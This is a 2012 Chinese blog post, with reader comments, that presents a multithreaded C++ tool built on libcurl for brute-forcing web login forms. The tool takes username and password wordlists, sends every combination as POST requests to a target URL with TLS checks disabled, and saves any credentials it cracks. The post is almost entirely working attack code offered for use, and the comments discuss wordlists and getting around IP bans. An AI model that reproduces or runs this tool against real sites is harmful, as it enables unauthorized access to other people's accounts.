公子周

                         --不乱于心,不困于情
随笔 - 3, 文章 - 0, 评论 - 5, 引用 - 0
数据加载中……

暴力破解Web表单


图为我的思考方式:

SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
        FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
    curl_global_init(CURL_GLOBAL_ALL); 
    SYSTEM_INFO info;//根据CPU生成线程数
    GetSystemInfo(&info);
    vector<string> user(istream_iterator<string>(ifstream(userfilename.c_str())),istream_iterator<string>());
    vector<string> pass(istream_iterator<string>(ifstream(passwordfilename.c_str())),istream_iterator<string>());
    fstream filed(headerfilename);
    while (!filed.eof())
    {    
        char temp[4096]="";
        filed.getline(temp,4096);
        vecheader1.push_back(temp);
    }
    filed.close();
    CWork::readpostdata(m_postdata);
    CWork::readkeyword(keyword);
    CWork::readurl(url);


    vector<UserPass> obj_userpass;
    for(size_t i=0;i!=user.size();i++)
    {
        for(size_t j=0;j!=pass.size();j++)
        {
            UserPass temp;
            temp.user=user[i];
            temp.pass=pass[j];
            obj_userpass.push_back(temp);
        }
    }

    string console_title;
    CWork::maketitle(console_title,"帐号数量:",user.size());
    CWork::maketitle(console_title,"密码数量:",pass.size());
    CWork::maketitle(console_title,"共计次数:",obj_userpass.size());
    wstring w_console_title=CWork::s2ws(console_title);
    SetConsoleTitle(w_console_title.c_str());

    user.clear();
    pass.clear();

    ////////////////////////生成测试数据////////////////////////
    if(obj_userpass.size()>=1)
    {
        pull_one_url(obj_userpass[0]);
        ofstream out("第一次数据测试.txt",ios::app);
        out<<sz_head<<endl<<endl;
        out<<"--------分割性-----------"<<endl;
        out<<sz_html<<endl;
        out.close();
    }
    ////////////////////////为了观察一下关键字,到底应该设置什么////////////////////////

    int thread_num=info.dwNumberOfProcessors*2;
    long current_pos=1;
    long result=0;
    int num_total=obj_userpass.size();
    console_title+="已发送:";

    while (1)
    {
        if (obj_userpass.size()<current_pos)
        {
            break;
        }
        vector<UserPass> obj;
        CWork::allocateUserPass(obj,obj_userpass,current_pos,thread_num);
        stringstream strStream;
        strStream<<result;
        string new_tile=console_title;
        new_tile+=strStream.str();
        if (szCount!=0)
        {
            new_tile+="  已成功破解:";
            stringstream strStream1;
            strStream1<<szCount;
            new_tile+=strStream1.str();
        }
        wstring w_console_title=CWork::s2ws(new_tile);
        SetConsoleTitle(w_console_title.c_str());
        thread_group threads;
        int obj_num=obj.size();
        for (int i = 0; i!=obj_num; ++ i) {
            result++;
            threads.create_thread(boost::bind(&pull_one_url,obj[i]));
        }
        threads.join_all();

    }
    cout<<"所有密码全部查找完成"<<endl;
    curl_global_cleanup();
void pull_one_url(UserPass obj)
{
    bool m_true=true;
    transform(keyword.begin(), keyword.end(), keyword.begin(), ::tolower);//所有html代码,转化为小写
    while(m_true)
    {
        string dddddd=m_postdata;
        if(dddddd.empty())
        {
            cout<<"postdata中数据为空,线程马上退出"<<endl;
            return;
        }
        if (url.empty()||url=="")
        {
            cout<<"attackurl.txt不存在,或url地址为空"<<endl;
            return;
        }


        
        
            CURL *curl = curl_easy_init();
            string m_url=url;

            string header;
            string html;


            struct curl_slist *slist_header = NULL;
            for (int i=0;i!=vecheader1.size();i++)
            {
                slist_header = curl_slist_append(slist_header,vecheader1[i].c_str());
            }
            curl_easy_setopt(curl, CURLOPT_HTTPHEADER, slist_header);
            //连接服务器和发送请求的超时设置,单位是毫秒
            curl_easy_setopt(curl, CURLOPT_POST, 1);  
            //curl_easy_setopt(curl,CURLOPT_FOLLOWLOCATION,1);
            curl_easy_setopt(curl,CURLOPT_TIMEOUT_MS,10000);
            curl_easy_setopt(curl,CURLOPT_CONNECTTIMEOUT_MS,10000);
            curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1);
            curl_easy_setopt(curl, CURLOPT_URL, url.c_str());
            if(m_url.substr(0,5)=="https")
            {
                curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
                curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
            }
            curl_easy_setopt(curl, CURLOPT_DNS_CACHE_TIMEOUT, 10000); 
            curl_easy_setopt(curl, CURLOPT_TIMEOUT, 6000);
            //curl_easy_setopt(curl, CURLOPT_VERBOSE,1);
            curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, html_write_data); 


            CWork::replace(dddddd,"{0%}",obj.user.c_str());
            CWork::replace(dddddd,"{1%}",obj.pass.c_str());

            curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, dddddd.length());     // Content-Length:
            curl_easy_setopt(curl,CURLOPT_POSTFIELDS,dddddd.c_str());  //post提交的数据
            curl_easy_setopt(curl, CURLOPT_WRITEDATA, &html);
            curl_easy_setopt(curl, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0");
            curl_easy_setopt(curl, CURLOPT_HEADERFUNCTION, header_write_data); 
            curl_easy_setopt(curl, CURLOPT_WRITEHEADER, &header);

            curl_easy_perform(curl); /* ignores error */ 
            //curl_easy_getinfo(curl,CURLINFO_SIZE_DOWNLOAD,&html_num);//返回的html文件大小
            long   http_code=0;
            curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &http_code);
            //curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &m_time);//总耗时
            
//curl_easy_getinfo(curl,CURLINFO_CONNECT_TIME, &connect_time);//连接时间
            
//curl_easy_getinfo(curl,CURLINFO_NAMELOOKUP_TIME, &datatime);//dns查询时间
            
//curl_easy_getinfo(curl, CURLINFO_PRIMARY_IP, &IP);//ip地址

            
//CURLINFO_PRETRANSFER_TIME:从建立连接到准备传输所使用的时间;
            
//CURLINFO_STARTTRANSFER_TIME:从建立连接到传输开始所使用的时间;
            
//ptime now2 = microsec_clock::universal_time() + hours(8);
            
//boost::posix_time::millisec_posix_time_system_config::time_duration_type time_elapse = now2 - now1;  
            transform(header.begin(), header.end(), header.begin(), ::tolower);//所有html代码,转化为小写
            transform(html.begin(), html.end(), html.begin(), ::tolower);//所有html代码,转化为小写
            
//在这里对html代码进行转码,如果是utf8就转gb2312
            if(header.find("utf")!=-1)
            {
                string gb2312html;
                CWork::Utf8ToGb2312(html.c_str(),gb2312html);
                html=gb2312html;
            }

            if (http_code==200||http_code==302)
            {
                if (html.find(keyword)==-1)
                {
                    szCount++;
                    boost::mutex::scoped_lock lock(io_mutex);
                    ofstream out(result,ios::app);
                    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_GREEN);
                    out<<"恭喜!!!  用户名:"<<obj.user<<"    密码:"<<obj.pass<<endl;
                    cout<<"http状态"<<http_code<<"密码破解成功1个    username:"<<obj.user<<"    password:"<<obj.pass<<endl;            
                    out.close();
                    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
                        FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
                }
                else
                {
                    boost::mutex::scoped_lock lock(io_mutex);
                    cout<<"密码错误"<<" 线程ID: "<<boost::this_thread::get_id()<<" http_code:"<<setw(3)<<http_code<<" 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
                }
            }
            else
            {
                if(http_code==0)
                {
                    boost::mutex::scoped_lock lock(io_mutex);
                    cout<<"超时马上重新连接"<<"用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
                    curl_easy_cleanup(curl);
                    continue;
                }
                boost::mutex::scoped_lock lock(io_mutex);
                cout<<"密码错误"<<" 线程ID: "<<boost::this_thread::get_id()<<" http_code:"<<http_code<<" 用户名:"<<obj.user<<" 密码:"<<obj.pass<<endl;
            }
            m_true=false;
            curl_easy_cleanup(curl);

            
            sz_html=html;
            sz_head=header;
        }


}

posted on 2012-07-09 18:07 公子周 阅读(2907) 评论(4)  编辑 收藏 引用 所属分类: 暴力破解

评论

# re: 暴力破解Web表单[未登录]  回复  更多评论   

如何设计用户名、密码本?或者说如何获得良好的这种本?
2012-07-10 08:55 | alex

# re: 暴力破解Web表单  回复  更多评论   

难道人家不会封IP?

你这IP频繁登录,肯定被封?

然后又代理?

然后又封代理的IP

哈...

找到网站的漏洞,直接rush
2012-07-10 11:52 | 13174115

# re: 暴力破解Web表单  回复  更多评论   

@alex

如何设计用户名、密码本?或者说如何获得良好的这种本?


post登陆的时候,是一个form表单,数据格式,先通过其它工具,如firefox查看,然后,得到下来,把用户名和密码,的位置替换成我的变量。写入文件中。

程序会根据我设置的用户名和密码,替换
post提交的数据。
2012-07-10 21:10 | 公子周

# re: 暴力破解Web表单  回复  更多评论   

没有验证码吗?
2012-07-13 20:54 |

只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   博问   Chat2DB   管理